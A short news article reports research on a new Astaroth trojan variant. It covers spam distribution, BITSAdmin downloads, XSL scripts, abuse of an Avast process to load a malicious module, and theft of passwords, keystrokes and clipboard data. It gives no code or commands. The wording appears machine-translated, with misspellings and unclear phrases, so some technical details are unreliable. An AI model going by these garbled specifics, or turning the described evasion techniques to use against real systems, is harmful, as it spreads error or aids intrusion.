A new version of Trojan Astaroth has the ability to exploit vulnerable processes in anti-virus software and services. Researchers of Cyctres' nocturnus team reported today in a publication at their blog that the variant is able to use security software modules to steal credentials and personal data on the internet.In its latest form, Astaroth is used in spam campaigns throughout Brazil and Europe, managing thousands of infections by the end of 2018. Malicious software spreads through .zip files and malicious links.
Astaroth Trojan: How It Works
Researchers report that the Trojan disguises itself as JPEG, .GIF, or an extension file to avoid being detected by security applications. when running on a machine. Microsoft Windows BITSAdmin tool from a command and control server (C2) is used to complete the malware download. Once downloaded, the malware runs an XSL script that creates a channel with the C2 server. The script is said to contain functions that help the malicious application to hide from security software, but also to use the BITSAdmin tool to download malicious loads from a separate C2 server. Earlier versions of the Trojan then tried to find anti-virus programs, and if Avast was on an infected system, the malware would stop working. However, the new Astaroth could fool the anti-virus program and add "a malicious module to one of its processes," according to the researchers. If it detects Avast, it violates the Avast Software Runtime Dynamic Link Library, which runs modules for Avast with the aswrundll.exe process. The executable file - which looks like a Microsoft rundll32.exe - can run a DLL by calling its exported functions. The Trojan first appeared in attacks against users in South America during 2017. Malware is capable of stealing information from target systems, such as passwords, keyboard data, and any content that was on the clipboard. In addition, Astaroth is also able to monitor calls if it is installed on a suitable device and terminates various processes. The new malware also uses a deCharCode () deobfuscation method to hide code execution. Last month, a new survey published by Malwarebytes reported that Trojan and backdoor attacks have more than doubled since the previous year. Also, spyware attacks have increased in frequency, recording an increase of 142% over the same period.